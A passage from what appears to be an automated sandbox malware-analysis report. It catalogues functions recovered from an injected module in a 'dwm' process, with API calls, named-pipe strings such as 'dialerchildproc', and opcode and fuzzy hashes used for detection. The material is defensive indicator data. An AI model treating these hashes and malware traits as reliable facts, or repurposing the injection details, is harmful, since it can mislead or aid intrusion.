                        • FlsSetValue.KERNEL32(?,?,00000001,0000026DB167ECCC,?,?,?,?,0000026DB167BF9F,?,?,?,?,?,0000026DB1677AB0), ref: 0000026DB167CF2C
                          • Part of subcall function 0000026DB167D6CC: HeapAlloc.KERNEL32 ref: 0000026DB167D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF54
                          • Part of subcall function 0000026DB167D744: HeapFree.KERNEL32 ref: 0000026DB167D75A
                          • Part of subcall function 0000026DB167D744: GetLastError.KERNEL32 ref: 0000026DB167D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF76
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 301ed5bb14b064f6288e9b6d371b203e0a3ce77f361148a81f8be7547da9ff02
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 4C41A230F0164D82FA68A7355D5D77922825F947FCF260B24AD36466EEFE2B984183C0
                        Function 0000026DB1672244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: a6316b0979e2fbe67aa6ecb4ef3804c197afbec74b3d3972a628f3e879a6a2a9
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 4A213D32B14B4483EB108B25F94875963A1F799BA8F510316EA5906BA8CF7DC549CB40
                        Function 0000026DB167A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: fe97a38da3887d38fe6b381f39902a620a8e1cdc3aeecd6a6c1a845a779baaae
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: 33E18E72B00B488AEB60DF75D88839D77A0F745B9CF160216EE8997B9DCB35C191CB80
                        Function 0000026DB15B9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: a71ae389052bf5c7477b96fab8a708b2f053a377208367fefffcd455af848454
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 00E19BB2B04B888AEB609F65D8883AE77F0F749B9CF111115EE8957B9DCB36C091C704
                        Function 0000026DB167F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: 34a5f04a675c29bba45678afa4d8b339d85152c9007b66407814b85f4990bcd6
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: EF41D432B12A0892FB56CB16AD08B556391F749BE8F1A43269D1E8778DEE3EC445C390
                        Function 0000026DB167104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: 6ff0f4e31309fca1d91147f0176eb4e575f76b7881582bbc4aebeb93d6a23bf7
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 6D414E32614B88C6E760CF21E85879A77B1F388B99F45822ADA890B75CDF39C549CB40
                        Function 0000026DB167D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D087
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0A6
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0CE
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0DF
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 954a692aea3c88c5f7c9bf3f83e41f5beb921ddac45903a4d90f3b8dbe18f632
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 6B112B30F0624C41FA6957356D5D73961415B543FCF265B24AC39877DEDE2BCC42C680
                        Function 0000026DB1677510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2ca1e9cc0510a1dc83c4ebc1fdbe52a86d72ccc91c1eb08f60ecf2a3e7dfac66
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 1C81F431F0034D86FB58AB69AC4D3A962D1A795B8CF1747259E048739EEF3BC94587C0
                        Function 0000026DB1679DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 80910329edf1ffe029c007fae956e48e731b96fd432fa162dc60bd09946df316
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 6831E631B12A48E1EE56DB06AC0876523E4FB48BB8F5B0B259D1D4B39DEF3AC445C390
                        Function 0000026DB1683DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 3be29c8b6ee06a43f894d8c0eb8399b5c23dbc4296c6f4c38889353b0137a19b
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 4D11BF31B10B4486E7508B16EC4831972A0F398FE9F150226EA5A877A8CF79C904C784
                        Function 0000026DB1672F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 06a9731fad265eec720ec02330506c44b2bc856f006b4449f55516324d5893dd
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 7231D632B01B5983E715CF1AED4872967A0FB54B88F0A4225DF4847B59EF3AC461C780
                        Function 0000026DB167CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: 8272e313bf2f98c1d76c3ec524ba701b3a36f3d82fe69078ea371fff082c91ce
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: 03118430F0528C82FA6597359D5D73962426F587FCF261B24AC36877DEEE6BC841C680
                        Function 0000026DB167199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 789c2f29df80aab3585e76fc158d761d8be0ff1fc08a61dd6c3f348cad7b4e43
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: B4018C31B00A4882EB20DB52E84C75963A1F798FC9F894036DE8943759DF3EC989C780
                        Function 0000026DB16736C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: 004c33209a75407f1c5ac69e976e5f372781efe8c72add93c4a71acd2f2cafed
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 27012D75B11748C2EB249B21EC0C71563B0BB59B8AF050529CD4907759EF3EC159C784
                        Function 0000026DB1678FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction ID: 69994dd598234411c7b9776327e139b7e875aea56ba6b2b073d6758336156509
                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction Fuzzy Hash: 3B51BB32B116088AEB14CF25EC4CB5937E6F354BADF128628EE064778CEB36C851C780
                        Function 0000026DB1671A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 6822d15bf2ea4c1d5abf329f3c2442f3a60ca9e6f7f68888c1e393d3424ea368
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: E0F0AF32B0064882EB209F20FC8875963A0F75CB8CF854022CE494AA5CDF3EC68DCB40
                        Function 0000026DB1673044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: 963ea69bb4682f8552846d996114bcaf5ce1374b44dfe754e358df0448e0bb9e
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 49F08C34B04B8882EA008F53BD0C1196260AB58FC8F09A132EE4A47B1CDF3DC5458780
                        Function 0000026DB167BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 60f506ef8e0a0636e45ed3efbc37f7172bb7ce73cd0bb4b9d645508b14d16507
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: AAF06271B1170881EB148B24EC4C3596320EB9476DF55431ACA6A451E8DF2EC145C780
                        Function 0000026DB1675710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction ID: 71a3a1791fbbd8631bb61634eba42eef120f79253a15aa8acee1f2e9ac7226c5
                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction Fuzzy Hash: 2C61AC36A19B88C7E7608B15E84831AB7E0F389798F121256EE9D47BACDB7DC540CF44
                        Function 0000026DB1684104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 2fd8bc095ae1dc8d3ecf83b9451b2106d68af31dc6b82ace00c112ea6864c00c
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 9011E572F64F5821F6641568EC5E37911506B783BDF0B0637AAF607BEECB2AC84182C0
                        Function 0000026DB15C3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 6024598afb9eed673d7ff236861958cb1af284cf447671a4e367276256a8206a
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 8C11A332F5CA1D51FAE42D29EC4E37916F06B7937CF4B8638A966063DECE26CB414109
                        Function 0000026DB15BF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: 27a2e66b669eab1c753a4d15e3227e235cac53aca00fd6f010fea62aea5effd2
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 5A619136F0064C46FA698F69ED4C33B6AF1E78674CF538816CA4A177ACDB36C9418318
                        Function 0000026DB167AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: ed75307b36ac753cbe7fa5074f57d764205b0379fdba377acf537441d2e996c4
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 15614632B01B888AEB20DF65D8843AD77A0F348B9CF194615EF4957B98DB39C595C780
                        Function 0000026DB167AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: 6b6a5d49be0c3c18dac6387b2fdc6ee7f08cef51d343966d1b910193e6e8642d
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: CC519272B00388CAEB748F16998835977A0F354B9DF1A9315EE5987BDDCB39D490CB80
                        Function 0000026DB15BA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: aa95c2ac0a2d4a6e4e7dc239bd489115e364599340e9f0847862f20b77fb2399
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 43519E32B01688CAEB748F15985837E77F0F355B88F1A4116DA9987BDDCB7AD490C708
                        Function 0000026DB15B8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 8e97cc8600b33874dade295c5adcc06b57596480224dc06543bde7582faf4c61
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: F151DE32B116089AEB15CF15E848BBA37F5F359B9CF66A124DA164378CEB36D841C708
                        Function 0000026DB15B83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 02dfdf68898d8c9c4dc96dde9d72021752e44a20d3889774263a11bd8cfbf571
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 0C318B32B1164896EB15DF11EC48BAA77F4F349B9CF669018EE5A0778CDB3AD940C708
                        Function 0000026DB1682058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
